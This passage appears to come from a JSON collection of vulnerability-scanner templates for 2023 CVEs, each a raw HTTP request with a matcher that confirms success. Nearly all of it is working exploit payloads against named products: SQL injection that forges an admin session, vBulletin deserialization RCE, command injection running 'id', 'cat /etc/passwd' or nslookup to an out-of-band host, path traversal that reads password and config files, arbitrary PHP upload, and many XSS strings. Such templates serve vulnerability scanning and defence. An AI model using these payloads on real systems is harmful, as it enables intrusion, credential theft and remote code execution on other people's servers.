/human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29622","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\")"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2023-33440'); ?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"high"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: 